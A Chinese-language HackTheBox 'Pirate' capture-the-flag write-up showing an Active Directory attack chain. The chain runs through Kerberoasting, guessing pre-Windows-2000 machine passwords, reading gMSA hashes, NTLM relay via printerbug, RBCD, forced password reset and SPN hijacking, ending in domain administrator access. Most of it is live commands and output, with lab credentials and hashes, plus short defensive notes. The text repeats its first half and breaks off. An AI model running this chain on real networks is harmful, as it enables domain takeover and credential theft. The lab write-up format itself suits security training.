HackTheBox Pirate Writeup

HackTheBox Pirate 是一台困难难度的 Windows 机器。本文按照信息收集、初始访问、横向或提权路径的顺序整理完整解题过程,突出关键漏洞点、凭据来源与最终拿到 user/root 或域权限的利用链。

htb pirate

类型: HTB 需要阅读: No

枚举

As is common in real life pentests, you will start the Pirate box with credentials for the following account pentest / p3nt3st2025!&

# Nmap 7.98 scan initiated Thu Mar  5 03:58:32 2026 as: /usr/lib/nmap/nmap -p 53,80,88,135,139,389,443,445,464,593,636,2179,3268,3269,5985,9389,49667,49685,49686,49688,49689,49913,61992,62014 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.7.169
Nmap scan report for 10.129.7.169
Host is up (0.19s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: NOTIMP)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-05 10:58:39Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
443/tcp   open  https?
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
2179/tcp  open  vmrdp?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:17+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
49913/tcp open  msrpc         Microsoft Windows RPC
61992/tcp open  msrpc         Microsoft Windows RPC
62014/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=3/5%Time=69A8FF73%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-03-05T10:59:39
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar  5 04:00:18 2026 -- 1 IP address (1 host up) scanned in 106.48 seconds

SMB

  Pirate nxc smb 10.129.7.169 -u pentest -p 'p3nt3st2025!&' --shares
SMB         10.129.7.169    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
SMB         10.129.7.169    445    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
SMB         10.129.7.169    445    DC01             [*] Enumerated shares
SMB         10.129.7.169    445    DC01             Share           Permissions     Remark
SMB         10.129.7.169    445    DC01             -----           -----------     ------
SMB         10.129.7.169    445    DC01             ADMIN$                          Remote Admin
SMB         10.129.7.169    445    DC01             C$                              Default share
SMB         10.129.7.169    445    DC01             IPC$            READ            Remote IPC
SMB         10.129.7.169    445    DC01             NETLOGON        READ            Logon server share
SMB         10.129.7.169    445    DC01             SYSVOL          READ            Logon server share

查看SYSVOL和NETLOGON

nxc smb 10.129.7.169 -u pentest -p 'p3nt3st2025!&' -M spider_plus
{
    "NETLOGON": {},
    "SYSVOL": {
        "pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2025-06-08 16:25:14",
            "ctime_epoch": "2025-06-08 14:39:53",
            "mtime_epoch": "2025-06-08 16:25:14",
            "size": "22 B"
        },
        "pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2025-06-08 14:39:53",
            "ctime_epoch": "2025-06-08 14:39:53",
            "mtime_epoch": "2025-06-08 14:39:56",
            "size": "1.07 KB"
        },
        "pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2025-06-08 16:25:14",
            "ctime_epoch": "2025-06-08 16:25:14",
            "mtime_epoch": "2025-06-08 16:25:14",
            "size": "2.72 KB"
        },
        "pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2025-06-09 16:12:18",
            "ctime_epoch": "2025-06-08 14:39:53",
            "mtime_epoch": "2025-06-09 16:12:18",
            "size": "22 B"
        },
        "pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/Audit/audit.csv": {
            "atime_epoch": "2025-06-09 16:12:18",
            "ctime_epoch": "2025-06-09 16:09:27",
            "mtime_epoch": "2025-06-09 16:12:18",
            "size": "312 B"
        },
        "pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2025-06-08 14:39:53",
            "ctime_epoch": "2025-06-08 14:39:53",
            "mtime_epoch": "2025-06-08 14:39:56",
            "size": "3.68 KB"
        }
    }

无任何价值


Kerberoasting

impacket-GetUserSPNs pirate.htb/pentest:'p3nt3st2025!&' -request -dc-ip 10.129.7.169
$krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb/a.white_adm*$8c19d96...9826a23a8

这个hash破解不出来


LDAP

  Pirate nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --users
LDAP        10.129.7.169    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
LDAP        10.129.7.169    389    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
LDAP        10.129.7.169    389    DC01             [*] Enumerated 7 domain users: pirate.htb
LDAP        10.129.7.169    389    DC01             -Username-                    -Last PW Set-       -BadPW-  -Description-
LDAP        10.129.7.169    389    DC01             Administrator                 2025-06-08 14:32:36 0        Built-in account for administering the computer/domain
LDAP        10.129.7.169    389    DC01             Guest                         <never>             0        Built-in account for guest access to the computer/domain
LDAP        10.129.7.169    389    DC01             krbtgt                        2025-06-08 14:40:29 0        Key Distribution Center Service Account
LDAP        10.129.7.169    389    DC01             a.white_adm                   2026-01-16 00:36:34 0
LDAP        10.129.7.169    389    DC01             a.white                       2025-06-08 19:33:01 0
LDAP        10.129.7.169    389    DC01             pentest                       2025-06-09 13:40:23 0
LDAP        10.129.7.169    389    DC01             j.sparrow                     2025-06-09 15:08:44 0
nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --kerberoasting output.txt
LDAP        10.129.7.169    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
LDAP        10.129.7.169    389    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
LDAP        10.129.7.169    389    DC01             [*] Skipping disabled account: krbtgt
LDAP        10.129.7.169    389    DC01             [*] Total of records returned 2
LDAP        10.129.7.169    389    DC01             [*] sAMAccountName: a.white_adm, memberOf: CN=IT,CN=Users,DC=pirate,DC=htb, pwdLastSet: 2026-01-16 00:36:34.388000, lastLogon: 2025-06-09 16:03:37.380258
LDAP        10.129.7.169    389    DC01             $krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb\a.white_adm*$3d0f7...d6aa2
LDAP        10.129.7.169    389    DC01             [*] sAMAccountName: gMSA_ADFS_prod$, memberOf: CN=Remote Management Users,CN=Builtin,DC=pirate,DC=htb, pwdLastSet: 2025-06-09 14:48:41.108220, lastLogon: 2026-03-05 10:51:58.242422
LDAP        10.129.7.169    389    DC01             $krb5tgs$18$gMSA_ADFS_prod$$PIRATE.HTB$*pirate.htb\gMSA_ADFS_prod$*$c7...fc3d

好像没什么用,查看一下groups

nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --groups
LDAP        10.129.7.169    389    DC01             Pre-Windows 2000 Compatible Access       membercount: 4

发现有趣的组:Pre-Windows 2000 Compatible Access

相关介绍

在 Active Directory (活动目录,简称 AD) 中,Pre-Windows 2000 Compatible Access(兼容 Windows 2000 之前的访问权限组,其 Security Identifier (安全标识符,简称 SID) 为 S-1-5-32-554)主要存在的不是代码级别的代码执行漏洞,而是一个极其危险的安全配置错误 (Security Misconfiguration),它会导致严重的信息泄露 (Information Disclosure),并为内网渗透和权限提升铺平道路。

这个组最初是为了让 Windows NT 4.0 等旧版操作系统能够查询 AD 信息而设计的。它的核心安全风险主要体现在以下几个方面:

1. 默认的过度读取权限 (Overly Permissive Read Access)

该组在 Active Directory 的根级别拥有广泛的 Read(读取)权限。具体来说,该组的成员可以读取域内几乎所有用户对象和组对象的属性。

  • 危险点: 在从早期系统(如 Windows Server 2000 或 2003)升级而来的域环境中,默认情况下,Everyone (所有人)Authenticated Users (已验证的用户) 经常是这个组的成员。
  • 渗透测试视角: 这意味着任何只要拥有一个普通域内低权限账号的攻击者(因为他们属于 Authenticated Users),甚至在某些配置下无需认证的攻击者(如果 Everyone 包含匿名登录),就可以不受限制地通过 Lightweight Directory Access Protocol (轻量级目录访问协议,简称 LDAP) 查询整个域的架构。

2. 匿名目录枚举 (Anonymous Directory Enumeration)

如果 Everyone 属于该组,并且域控制器允许空会话 (Null Session) 或匿名 LDAP 绑定:

  • 攻击者可以在未获取任何凭据的情况下,通过网络直接连接到域控制器。
  • 利用工具(如 rpcclient 或通过 LDAP 查询)枚举出域内的所有用户名、群组列表、甚至某些用户的详细描述 (Description) 字段。
  • 危害: 描述字段中经常会不慎包含明文密码、服务账号的用途或其他敏感内网信息。

3. 辅助高级域渗透攻击 (Facilitating Advanced Domain Attacks)

Pre-Windows 2000 Compatible Access 组提供的无限制信息收集能力,是执行后续高级攻击的基石。攻击者可以轻易收集到以下信息来制定攻击路径:

  • Targeting (目标定位): 快速找到 Domain Admins (域管理员)、Enterprise Admins (企业管理员) 等高权限群组的成员。
  • Kerberoasting 攻击: 通过枚举具有 Service Principal Name (服务主体名称,简称 SPN) 属性的服务账户,请求其服务票据 (Service Ticket) 并进行离线密码破解。
  • AS-REP Roasting 攻击: 查询所有配置了 “Do not require Kerberos preauthentication”(不需要 Kerberos 预身份验证)属性的用户,并针对这些用户进行离线哈希破解。
  • BloodHound 寻路: 该组的权限足以让 BloodHound 收集到绝大多数的节点关系图,从而计算出从普通用户到域管理员的最短攻击路径 (Shortest Path to Domain Admin)。

4. 掩盖后门 (Persistence & Backdoors)

在红队行动 (Red Team Operations) 中,如果攻击者获取了高权限,他们可能会故意将普通用户或特定后门账号加入到 Pre-Windows 2000 Compatible Access 组中。因为这是一个系统内置的、名字看起来像“兼容性”的老旧组,蓝队或系统管理员在审计时往往会忽略它,从而允许攻击者维持对域内信息的隐蔽监控权限。


修复建议与防御措施:

作为防御方或在出具渗透测试报告时,应建议以下修复措施:

  1. 清理组成员: 打开 “Active Directory Users and Computers” (Active Directory 用户和计算机,简称 ADUC),检查 Pre-Windows 2000 Compatible Access 组的成员。移除 EveryoneAnonymous Logon (匿名登录) 和 Authenticated Users
  2. 谨慎添加: 除非内网确实存在极其老旧的遗留系统(通常现在已不存在),否则该组应该保持为空。
  3. 禁用匿名 LDAP: 确保在域控制器的注册表或组策略中禁用了匿名 LDAP 绑定操作。

利用

既然我们在AUTHENTICATED USERS@PIRATE.HTB(属于Pre-Windows 2000 Compatible Access)组里就相当于我们可以阅读所有的信息

ldapsearch -x -H ldap://10.129.7.169 -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' -b "DC=pirate,DC=htb" "(objectClass=user)" > all_users_attributes.txt

尝试读取泄露的密码

grep -i -E "pass|pwd|userparameters|info" all_users_attributes.txt
# 毫无收获

尝试读取gmsa密码

nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --gmsa
# Account: gMSA_ADCS_prod$ NTLM: <no read permissions> PrincipalsAllowedToReadPassword: Domain Secure Servers

只有组Domain Secure Servers才能读取,查询有哪些用户

ldapsearch -x -H ldap://10.129.7.169 -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' -b "DC=pirate,DC=htb" "(&(objectCategory=group)(cn=Domain Secure Servers))" member
# 返回member: CN=MS01,CN=Computers,DC=pirate,DC=htb

只有MS01才可以读取


Pre2K

通过谷歌搜索可以知道nxc的pre2k模块

相关介绍

在默认情况下,当一台计算机加入域时,域控会自动为其生成一个 120 字符长、完全随机的机器账户密码(通常每 30 天自动滚动一次),这使得爆破机器账户几乎不可能。

但是,Active Directory 用户和计算机 (ADUC) 管理工具里,一直保留着一个为了兼容老掉牙的 NT 系统而存在的复选框:“将此计算机帐户指定为 Windows 2000 之前的计算机 (Assign this computer account as a pre-Windows 2000 computer)”。

如果管理员在手动预创建计算机账户时(比如还没分配物理机,只是先在 AD 里建个坑位)勾选了这个框,极其离谱的事情就会发生: AD 不会生成随机密码,而是直接把这台计算机名字的小写,作为它的初始密码!

  • 例如:新建了一个机器账户叫 SERVERDEMO$,它的密码就是 serverdemo
  • 我们的目标叫 MS01$,如果它存在这个漏洞,它的密码就是 ms01

利用

nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' -M pre2k
# MS01$和EXCH01$

读取gmsa

nxc ldap DC01.pirate.htb -u 'MS01$' -p 'ms01' -k --gmsa
Account: gMSA_ADCS_prod$      NTLM: 304106f739822ea2ad8ebe23f802d078     
Account: gMSA_ADFS_prod$      NTLM: 8126756fb2e69697bfcb04816e685839    

USER

evil-winrm连接

evil-winrm -u 'gMSA_ADCS_prod$' -H '304106f739822ea2ad8ebe23f802d078' -i DC01.pirate.htb

检查网络

*Evil-WinRM* PS C:\Users> ipconfig

Windows IP Configuration

Ethernet adapter vEthernet (Switch01):

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::d976:c606:587e:f1e1%8
   IPv4 Address. . . . . . . . . . . : 192.168.100.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.7.169
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

ligolo-ng搭建桥梁

有关搭建查看ligolo-ng官网

寻找存活主机

nxc smb 192.168.100.0/24
SMB         192.168.100.1   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
SMB         192.168.100.2   445    WEB01            [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB01) (domain:pirate.htb) (signing:False) (SMBv1:False)

发现WEB01,且SMB签名禁用。证明可以尝试ntlm中继攻击

查询打印机

nxc smb 192.168.100.2 -u GMSA_ADFS_PROD$ -H 8126756fb2e69697bfcb04816e685839 -M spooler
# 返回Spooler service enabled

准备中继

sudo impacket-ntlmrelayx -t smb://10.129.7.169 -smb2support --remove-mic -socks
# --remove-mic消息完整性代码 Message Integrity Code

ligolo中配置转发

[Agent : PIRATE\gMSA_ADFS_prod$@DC01] » listener_add  --addr 0.0.0.0:8888 --to 127.0.0.1:445

执行攻击

python printerbug.py -hashes :8126756fb2e69697bfcb04816e685839 'pirate.htb/GMSA_ADFS_PROD$'@192.168.100.2 10.10.17.34

进去以后执行了RBCD攻击,获得了WEB01机器的权限

image 138.png

利用凭据XUPXYXWJ$:Mvb0i(gL8v$>{PG获取administrator的TGT,随后导出nthash

impacket-secretsdump -k -no-pass -target-ip 192.168.100.2 WEB01.pirate.htb
# 得到a.white : E2nvAOKSz5Xz2MJu

ROOT

根据bloodhound:a.whitea.white_ADMForceChangePassword

bloodyAD --host 192.168.100.1 -d Pirate.htb -u a.white -p E2nvAOKSz5Xz2MJu set password 'a.white_ADM' 'P@ssword123!'
# [+] Password changed successfully!

a.white_ADM属于IT组对DC01.PIRATE有WriteSPN权限,找出委派关系

impacket-findDelegation pirate.htb/a.white_adm:'P@ssword123!' -dc-ip 192.168.100.1
AccountName  AccountType  DelegationType                      DelegationRightsTo     SPN Exists
-----------  -----------  ----------------------------------  ---------------------  ----------
DC01$        Computer     Unconstrained                       N/A                    Yes
a.white_adm  Person       Constrained w/ Protocol Transition  http/WEB01.pirate.htb  Yes
a.white_adm  Person       Constrained w/ Protocol Transition  HTTP/WEB01             Yes
XUPXYXWJ$    Computer     Resource-Based Constrained          WEB01$                 No

SPN 劫持

  • 用户 a.white_adm 被允许代表任何人(协议转换)去访问 WEB01HTTP 服务。
  • a.white_admDC01 拥有 WriteSPN 权限。

利用 SPN 的唯一性,把本该属于 WEB01 的委派权,转移到 DC01 身上,以实现a.white_adm以管理员访问DC01

移除WEB01的SPN

python3 ~/Work/Tools/krbrelayx/addspn.py -t 'WEB01$' -u 'pirate.htb\a.white_adm' -p 'P@ssword123!' 'DC01.pirate.htb'  -r --spn 'http/WEB01.pirate.htb'
# 返回SPN Modified successfully

转移

python3 ~/Work/Tools/krbrelayx/addspn.py -t 'DC01$' -u 'pirate.htb\a.white_adm' -p 'P@ssword123!' 'dc01.pirate.htb' -s 'http/WEB01.pirate.htb'
# 返回SPN Modified successfully

获取票据

impacket-getST -spn 'http/WEB01.pirate.htb' -impersonate administrator 'pirate.htb/a.white_adm:P@ssword123!' -dc-ip 10.129.7.169 -altservice 'cifs/DC01.pirate.htb'
# 返回Saving ticket in administrator@http_WEB01.pirate.htb@PIRATE.HTB.ccache
# -altservice参数绕过了协议转换的限制

因为TG是长期的,所以DC信任

impacket-smbclient -k -no-pass DC01.pirate.htb

即可获取root


HTB pirate

类型: HTB 需要阅读: No

枚举

As is common in real life pentests, you will start the Pirate box with credentials for the following account pentest / p3nt3st2025!&

# Nmap 7.98 scan initiated Thu Mar  5 03:58:32 2026 as: /usr/lib/nmap/nmap -p 53,80,88,135,139,389,443,445,464,593,636,2179,3268,3269,5985,9389,49667,49685,49686,49688,49689,49913,61992,62014 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.7.169
Nmap scan report for 10.129.7.169
Host is up (0.19s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: NOTIMP)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-05 10:58:39Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
443/tcp   open  https?
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
2179/tcp  open  vmrdp?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:17+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
49913/tcp open  msrpc         Microsoft Windows RPC
61992/tcp open  msrpc         Microsoft Windows RPC
62014/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=3/5%Time=69A8FF73%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-03-05T10:59:39
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar  5 04:00:18 2026 -- 1 IP address (1 host up) scanned in 106.48 seconds

SMB

  Pirate nxc smb 10.129.7.169 -u pentest -p 'p3nt3st2025!&' --shares
SMB         10.129.7.169    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
SMB         10.129.7.169    445    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
SMB         10.129.7.169    445    DC01             [*] Enumerated shares
SMB         10.129.7.169    445    DC01             Share           Permissions     Remark
SMB         10.129.7.169    445    DC01             -----           -----------     ------
SMB         10.129.7.169    445    DC01             ADMIN$                          Remote Admin
SMB         10.129.7.169    445    DC01             C$                              Default share
SMB         10.129.7.169    445    DC01             IPC$            READ            Remote IPC
SMB         10.129.7.169    445    DC01             NETLOGON        READ            Logon server share
SMB         10.129.7.169    445    DC01             SYSVOL          READ            Logon server share

查看SYSVOL和NETLOGON

nxc smb 10.129.7.169 -u pentest -p 'p3nt3st2025!&' -M spider_plus
{
    "NETLOGON": {},
    "SYSVOL": {
        "pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2025-06-08 16:25:14",
            "ctime_epoch": "2025-06-08 14:39:53",
            "mtime_epoch": "2025-06-08 16:25:14",
            "size": "22 B"
        },
        "pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2025-06-08 14:39:53",
            "ctime_epoch": "2025-06-08 14:39:53",
            "mtime_epoch": "2025-06-08 14:39:56",
            "size": "1.07 KB"
        },
        "pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2025-06-08 16:25:14",
            "ctime_epoch": "2025-06-08 16:25:14",
            "mtime_epoch": "2025-06-08 16:25:14",
            "size": "2.72 KB"
        },
        "pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2025-06-09 16:12:18",
            "ctime_epoch": "2025-06-08 14:39:53",
            "mtime_epoch": "2025-06-09 16:12:18",
            "size": "22 B"
        },
        "pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/Audit/audit.csv": {
            "atime_epoch": "2025-06-09 16:12:18",
            "ctime_epoch": "2025-06-09 16:09:27",
            "mtime_epoch": "2025-06-09 16:12:18",
            "size": "312 B"
        },
        "pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2025-06-08 14:39:53",
            "ctime_epoch": "2025-06-08 14:39:53",
            "mtime_epoch": "2025-06-08 14:39:56",
            "size": "3.68 KB"
        }
    }

无任何价值


Kerberoasting

impacket-GetUserSPNs pirate.htb/pentest:'p3nt3st2025!&' -request -dc-ip 10.129.7.169
$krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb/a.white_adm*$8c19d96...9826a23a8

这个hash破解不出来


LDAP

  Pirate nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --users
LDAP        10.129.7.169    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
LDAP        10.129.7.169    389    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
LDAP        10.129.7.169    389    DC01             [*] Enumerated 7 domain users: pirate.htb
LDAP        10.129.7.169    389    DC01             -Username-                    -Last PW Set-       -BadPW-  -Description-
LDAP        10.129.7.169    389    DC01             Administrator                 2025-06-08 14:32:36 0        Built-in account for administering the computer/domain
LDAP        10.129.7.169    389    DC01             Guest                         <never>             0        Built-in account for guest access to the computer/domain
LDAP        10.129.7.169    389    DC01             krbtgt                        2025-06-08 14:40:29 0        Key Distribution Center Service Account
LDAP        10.129.7.169    389    DC01             a.white_adm                   2026-01-16 00:36:34 0
LDAP        10.129.7.169    389    DC01             a.white                       2025-06-08 19:33:01 0
LDAP        10.129.7.169    389    DC01             pentest                       2025-06-09 13:40:23 0
LDAP        10.129.7.169    389    DC01             j.sparrow                     2025-06-09 15:08:44 0
nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --kerberoasting output.txt
LDAP        10.129.7.169    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
LDAP        10.129.7.169    389    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
LDAP        10.129.7.169    389    DC01             [*] Skipping disabled account: krbtgt
LDAP        10.129.7.169    389    DC01             [*] Total of records returned 2
LDAP        10.129.7.169    389    DC01             [*] sAMAccountName: a.white_adm, memberOf: CN=IT,CN=Users,DC=pirate,DC=htb, pwdLastSet: 2026-01-16 00:36:34.388000, lastLogon: 2025-06-09 16:03:37.380258
LDAP        10.129.7.169    389    DC01             $krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb\a.white_adm*$3d0f7...d6aa2
LDAP        10.129.7.169    389    DC01             [*] sAMAccountName: gMSA_ADFS_prod$, memberOf: CN=Remote Management Users,CN=Builtin,DC=pirate,DC=htb, pwdLastSet: 2025-06-09 14:48:41.108220, lastLogon: 2026-03-05 10:51:58.242422
